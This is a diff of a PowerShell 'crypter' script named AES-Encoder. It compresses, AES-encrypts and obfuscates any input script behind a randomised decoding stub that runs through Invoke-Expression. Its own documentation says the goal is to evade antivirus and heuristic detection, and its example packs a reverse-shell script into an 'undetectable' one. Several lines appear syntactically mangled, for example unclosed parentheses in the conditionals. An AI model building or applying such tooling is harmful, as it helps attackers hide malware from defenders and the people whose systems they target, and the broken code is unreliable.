1+ # AES-Encoder - PowerShell crypter
2+ # Copyright (C) 2022 Chainski
3+ #
4+ # This program is free software: you can redistribute it and/or modify
5+ # it under the terms of the GNU General Public License as published by
6+ # the Free Software Foundation, either version 3 of the License, or
7+ # (at your option) any later version.
8+ #
9+ # This program is distributed in the hope that it will be useful,
10+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
11+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12+ # GNU General Public License for more details.
13+ #
14+ # You should have received a copy of the GNU General Public License
15+ # along with this program. If not, see <https://www.gnu.org/licenses/>.
16+ # Made by https://github.com/chainski
17+
18+ $console = $host.UI.RawUI
19+ $console.WindowTitle = " Powershell AES-Encoder"
20+ Set-StrictMode - Version Latest
21+ $ErrorActionPreference = " Stop"
22+ $PSDefaultParameterValues [' *:ErrorAction' = ' Stop'
23+
24+ function Create-Var () {
25+
26+ (1 .. 9 | % {[byte ](Get-Random - Max 256 )}| foreach ToString X2) -join ' '
27+ }
28+
29+ function RAND () {
30+
31+ $set = " xQpVQLuQpVQpVQpVQpVQWpVQpVQpVQpVQpVQpVQpKVQpVQpVQpVQpV"
32+ (1 .. (6 + (Get-Random - minimum 8 - Maximum 10 )) | % { $set [(Get-Random - Minimum 10 - Maximum $set.Length )] } ) -join ' '
33+ }
34+
35+ function Invoke-AES-Encoder {
36+ <#
37+ . SYNOPSIS
38+
39+ Invoke-AES-Encoder takes any PowerShell script as an input and both packs and encrypts it to evade AV.
40+ It also lets you layer this recursively however many times you want in order to foil dynamic & heuristic detection.
41+
42+ . DESCRIPTION
43+
44+ Invoke-AES-Encoder takes any PowerShell script as an input and both packs and encrypts it to evade AV.
45+ The output script is highly randomized in order to make static analysis even more difficut.
46+ It also lets you layer this recursively however many times you want in order to attempt to foil dynamic & heuristic detection.
47+
48+
49+ . PARAMETER InFile
50+ Specifies the script to obfuscate/encrypt.
51+
52+ . PARAMETER OutFile
53+ Specifies the output script.
54+
55+ . PARAMETER Iterations
56+ The number of times the PowerShell script will be packed & crypted recursively. Default is 4.
57+
58+ . EXAMPLE
59+
60+ PS> Invoke-AES-Encoder -InFile reverse-shell.ps1 -OutFile undetectable.ps1 -Iterations 12
61+
62+ . LINK
63+
64+ https://github.com/chainski/AES-Encoder
65+
66+ #>
67+
68+ [CmdletBinding ()]
69+ Param (
70+ [Parameter (Mandatory , ValueFromPipeline , ValueFromPipelineByPropertyName )]
71+ [string ] $infile = $ (Throw (" -InFile is required" ,
72+ [Parameter (Mandatory , ValueFromPipeline , ValueFromPipelineByPropertyName )]
73+ [string ] $outfile = $ (Throw (" -OutFile is required" ,
74+ [Parameter (Mandatory = $false , ValueFromPipeline , ValueFromPipelineByPropertyName )]
75+ [string ] $iterations = 4
76+ )
77+
78+ Process {
79+ Write-Host `r`n
80+ Write-Host - ForegroundColor Red " ░░░░░ ░░░░░░░ ░░░░░░░ ░░░░░░░ ░░░ ░░ ░░░░░░ ░░░░░░ ░░░░░░ ░░░░░░░ ░░░░░░ "
81+ Write-Host - ForegroundColor White " ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ "
82+ Write-Host - ForegroundColor Red " ▒▒▒▒▒▒▒ ▒▒▒▒▒ ▒▒▒▒▒▒▒ ▒▒▒▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒▒▒▒ ▒▒▒▒▒▒ "
83+ Write-Host - ForegroundColor White " ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ "
84+ Write-Host - ForegroundColor Red " ██ ██ ███████ ███████ ███████ ██ ████ ██████ ██████ ██████ ███████ ██ ██ "
85+ Write-Host - ForegroundColor Blue " ╔═════════════════════════════════════════╗ "
86+ Write-Host - ForegroundColor White " ║ AES Encoder 1.0.0.0 ║ "
87+ Write-Host - ForegroundColor Blue " ║ coded by Chainski ║ "
88+ Write-Host - ForegroundColor White " ║ For Educational Purposes Only ║ "
89+ Write-Host - ForegroundColor Red " ║ Github ║ "
90+ Write-Host - ForegroundColor White " ║ https://github.com/chainski/AES-Encoder ║ "
91+ Write-Host - ForegroundColor Blue " ╚═════════════════════════════════════════╝ "
92+
93+ Write-Host `r`n
94+ sleep 1
95+ # read
96+ Write-Host " [*] Reading '$ ( $infile ) ' ..."
97+ $codebytes = [System.IO.File ]::ReadAllBytes($infile )
98+
99+
100+ for ($i = 1 ; $i -le $iterations ; $i ++ ) {
101+
102+ Write-Host " [*] Starting Encryption Process ..." - ForegroundColor Red
103+ $paddingmodes = ' PKCS7' , ' ISO10126' , ' ANSIX923' , ' Zeros'
104+ $paddingmode = $paddingmodes | Get-Random
105+ $ciphermode = ' CBC'
106+ $keysizes = 128 , 192 , 256
107+ $keysize = $keysizes | Get-Random
108+ $compressiontypes = ' Gzip' , ' Deflate'
109+ $compressiontype = $compressiontypes | Get-Random
110+
111+ # compress
112+ Write-Host " [*] Compressing ..."
113+ [System.IO.MemoryStream ] $output = New-Object System.IO.MemoryStream
114+ if ($compressiontype -eq " Gzip"
115+ $compressionStream = New-Object System.IO.Compression.GzipStream $output , ([IO.Compression.CompressionMode ]::Compress)
116+ } elseif ( $compressiontype -eq " Deflate"
117+ $compressionStream = New-Object System.IO.Compression.DeflateStream $output , ([IO.Compression.CompressionMode ]::Compress)
118+ }
119+ $compressionStream.Write ( $codebytes , 0 , $codebytes.Length )
120+ $compressionStream.Close ()
121+ $output.Close ()
122+ $compressedBytes = $output.ToArray ()
123+
124+ # generate key
125+ Write-Host " [*] Generating Encryption Key ..."
126+
127+ $aesManaged = New-Object " System.Security.Cryptography.AesManaged"
128+ $aesManaged.Mode = [System.Security.Cryptography.CipherMode ]::CBC
129+
130+ if ($paddingmode -eq ' PKCS7'
131+ $aesManaged.Padding = [System.Security.Cryptography.PaddingMode ]::PKCS7
132+ } elseif ($paddingmode -eq ' ISO10126'
133+ $aesManaged.Padding = [System.Security.Cryptography.PaddingMode ]::ISO10126
134+ } elseif ($paddingmode -eq ' ANSIX923'
135+ $aesManaged.Padding = [System.Security.Cryptography.PaddingMode ]::ANSIX923
136+ } elseif ($paddingmode -eq ' Zeros'
137+ $aesManaged.Padding = [System.Security.Cryptography.PaddingMode ]::Zeros
138+ }
139+
140+ $aesManaged.BlockSize = 128
141+ $aesManaged.KeySize = 256
142+ $aesManaged.GenerateKey ()
143+ $b64key = [System.Convert ]::ToBase64String($aesManaged.Key )
144+
145+ # encrypt
146+ Write-Host " [*] Encrypting with AES ..." - ForegroundColor Red
147+ $encryptor = $aesManaged.CreateEncryptor ()
148+ $encryptedData = $encryptor.TransformFinalBlock ($compressedBytes , 0 , $compressedBytes.Length );
149+ [byte []] $fullData = $aesManaged.IV + $encryptedData
150+ $aesManaged.Dispose ()
151+ $b64encrypted = [System.Convert ]::ToBase64String($fullData )
152+
153+ Write-Host " [*] Randomizing Cases ..."
154+ # write
155+ Write-Host " [*] Obfuscating Layers ..."
156+
157+ # Added Support for Unicode and HTML Decoding
158+
159+ $stub_template = ' '
160+
161+ $code_alternatives = @ ()
162+ $code_alternatives += ' ([SYstEm.teXt.encODIng]::uTf8.gETSTriNG([sysTEM.cONVErT]::fRomBAse64StRInG("QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uV2ViID4gJG51bGw="))) | iex' + " `r`n "
163+ $code_alternatives += ' ${2} = [coNVeRT]::fROmbASE64sTRINg("{0}")' + " `r`n "
164+ $code_alternatives += ' ${2} = [coNVeRT]::fROmbASE64sTRINg("{0}")' + " `r`n "
165+ $code_alternatives += ' ${3} = [coNVeRT]::fRomBaSE64sTRINg("{1}")' + " `r`n "
166+ $code_alternatives += ' ${4} = [System.Net.WebUtility]::HtmlDecode("New-Object "System.Security.Cryptography.AesManaged"") | iex' + " `r`n "
167+ $code_alternatives_shuffled = $code_alternatives
168+ $stub_template += $code_alternatives_shuffled -join ' '
169+
170+ $code_alternatives = @ ()
171+ $code_alternatives += ' ${4}.ModE = [REGex]::uNesCapE("\u005b\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0053\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0043\u0072\u0079\u0070\u0074\u006f\u0067\u0072\u0061\u0070\u0068\u0079\u002e\u0043\u0069\u0070\u0068\u0065\u0072\u004d\u006f\u0064\u0065\u005d\u003a\u003a\u0043\u0042\u0043") | iex' + " `r`n "
172+ $code_alternatives += ' ${4}.Padding = [sYsTem.SECuRIty.cRYptOGRaPhy.PaDdiNgMoDe]::' + $paddingmode + " `r`n "
173+ $code_alternatives += ' ${4}.BlOckSIze = [SySTEm.NET.WeButiliTy]::hTmLdEcOdE("128") | iex' + " `r`n "
174+ $code_alternatives += ' ${4}.KeySize = ' + $keysize + " `n " + ' ${4}.Key = ${3}' + " `r`n "
175+ $code_alternatives += ' ${4}.Iv = ${2}[0..15]' + " `r`n "
176+ $code_alternatives_shuffled = $code_alternatives
177+ $stub_template += $code_alternatives_shuffled -join ' '
178+
179+ $code_alternatives = @ ()
180+ $code_alternatives += ' ${6} = nEw-OBJECt sySTeM.io.mEmorYSTrEam(,${4}.CrEAtedECrYptor().TRaNsFOrmfinaLBlOCk(${2},16,${2}.LEnGth-16))' + " `r`n "
181+ $code_alternatives += ' ${7} = [RegEX]::UnESCaPe("\u004e\u0065\u0077\u002d\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0049\u004f\u002e\u004d\u0065\u006d\u006f\u0072\u0079\u0053\u0074\u0072\u0065\u0061\u006d") | iex' + " `r`n "
182+ $code_alternatives_shuffled = $code_alternatives
183+ $stub_template += $code_alternatives_shuffled -join ' '
184+
185+ if ($compressiontype -eq " Gzip"
186+ $stub_template += ' ${5} = nEw-oBject sYSTEM.IO.cOmPreSsiOn.gZIpStReAM ${6}, ([IO.Compression.CompressionMode]::Decompress)' + " `r`n "
187+ } elseif ( $compressiontype -eq " Deflate"
188+ $stub_template += ' ${5} = NEw-oBject SySteM.iO.ComprESsIoN.DEfLAtEsTReAM ${6}, ([io.CompREsSION.COmPressionMOdE]::DecompReSs)' + " `r`n "
189+ }
190+ $stub_template += ' ${5}.CoPyTo(${7})' + " `r`n "
191+
192+ $code_alternatives = @ ()
193+ $code_alternatives += ' ${5}.ClosE()' + " `r`n "
194+ $code_alternatives += ' ${4}.DisPoSe()' + " `r`n "
195+ $code_alternatives += ' ${6}.ClosE()' + " `r`n "
196+ $code_alternatives += ' ${8} = [sYStem.texT.enCoDIng]::uTF8.GETstrInG(${7}.tOArraY())' + " `r`n "
197+ $code_alternatives_shuffled = $code_alternatives
198+ $stub_template += $code_alternatives_shuffled -join ' '
199+ $stub_template += (' INVoke-ExPREsSion' , ' IeX' | Get-Random )+ ' (${8})' + " `r`n "
200+
201+
202+ # it's ugly, but it beats concatenating each value manually.
203+ $code = $stub_template -f $b64encrypted , $b64key , (Create- Var), (Create- Var), (RAND), (Create- Var), (Create- Var), (Create- Var), (Create- Var), (Create- Var)
204+ $codebytes = [System.Text.Encoding ]::UTF8.GetBytes($code )
205+ }
206+ Write-Host " [*] Writing '$ ( $outfile ) ' ..."
207+ [System.IO.File ]::WriteAllText($outfile , $code )
208+ Write-Host " [+] Done!" - ForegroundColor Red
209+ }
210+ }
0 commit comments